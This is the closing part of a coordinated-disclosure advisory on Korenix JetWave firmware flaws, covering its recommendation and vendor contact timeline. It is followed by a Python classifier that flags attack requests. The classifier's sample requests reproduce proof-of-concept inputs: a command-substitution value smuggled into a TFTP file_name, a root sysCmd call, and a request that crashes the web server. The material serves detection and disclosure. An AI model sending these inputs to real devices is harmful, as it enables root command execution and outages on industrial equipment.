V1.6<br /> * Korenix JetWave 3220/3420 V3 V1.7<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends customers of Korenix to upgrade the firmware to the<br />latest version available. Furthermore, a full security review by professionals<br />is recommended.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com<br />2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by<br />            the vendor. The vendor planned to fix the vulnerabilities in the<br />            next 1.5 months.<br />2023-01-04: Contact shared the updated firmware version.
            CyberDanube checked whether the vulnerabilities had been fixed.<br />            The contact communicated that not only the JetWave4221 is vulnerable<br />            to these issues. Therefore, CyberDanube postponed the release of the<br />            advisory until the other products had been patched.<br />2023-01-30: Meeting with Beijer Electronics. Customers were informed about the<br />            issues. Fixes were published. The disclosure date was shifted to<br />            2023-02-13 to provide a time window for patching.<br />2023-02-13: Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF S. Dietz, T. Weber / @2023<br /><br /><br /></code></pre>
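As an added example, not from the advisory or the vendor: a Python classifier for captured requests to the three /goform endpoints named in the proof of concept, of the kind a reverse proxy or syslog pipeline in front of a JetWave device could run to raise an alert. The sample requests are constructed in the shape of the captures above, with the session cookie redacted.

```python
import re
from urllib.parse import parse_qs

# Endpoints named in the advisory's proof of concept.
TFTP_PATH = "/goform/formTFTPLoadSave"   # 1.a: file_name reaches a shell unquoted
SYSCMD_PATH = "/goform/formSysCmd"       # 1.b: sysCmd is executed as root
DEFAULT_PATH = "/goform/formDefault"     # 2:   the request crashes goahead
# Characters that never belong in a TFTP file name but do drive command substitution.
SHELL_META = re.compile(r"[$`;|&<>(){}\n]")

def parse_http_request(raw):
    """Return (method, path, body) of a raw HTTP/1.1 request; headers are not needed here."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    return method, target.split("?", 1)[0], body

def classify_request(raw):
    """Return (severity, reason) findings for one request; an empty list means benign."""
    method, path, body = parse_http_request(raw)
    if method != "POST":
        return []
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if path == SYSCMD_PATH:
        return [("high", f"formSysCmd runs sysCmd as root: {params.get('sysCmd', '')!r}")]
    if path == TFTP_PATH:
        fname = params.get("file_name", "")
        if SHELL_META.search(fname):
            return [("high", f"shell metacharacters in TFTP file_name: {fname!r}")]
        return []
    if path == DEFAULT_PATH:
        return [("medium", "POST to formDefault crashes goahead until the device reboots")]
    return []

def _request(path, body):
    """Build a constructed request in the shape of the advisory's captures."""
    return (f"POST {path} HTTP/1.1\r\nHost: 172.16.0.38\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\nCookie: -common-web-session-=REDACTED\r\n\r\n" + body)

# Constructed samples: the three PoC bodies quoted above plus a benign TFTP load.
SAMPLES = {
    "tftp_injection": _request(TFTP_PATH, "submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1"
                               "&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit"),
    "syscmd": _request(SYSCMD_PATH, "sysCmd=touch%20/tmp/poc2&submit-url="),
    "dos": _request(DEFAULT_PATH, "PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping"),
    "benign_tftp": _request(TFTP_PATH, "submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1"
                            "&file_name=backup.cfg&tftp_action=load&tftp_config=Submit"),
}

def audit(samples=SAMPLES):
    """Map each sample name to its findings."""
    return {name: classify_request(raw) for name, raw in samples.items()}
```

Because the injection is authenticated, the session cookie in a flagged request identifies which account issued it, which is the first thing to pull from the device log during triage.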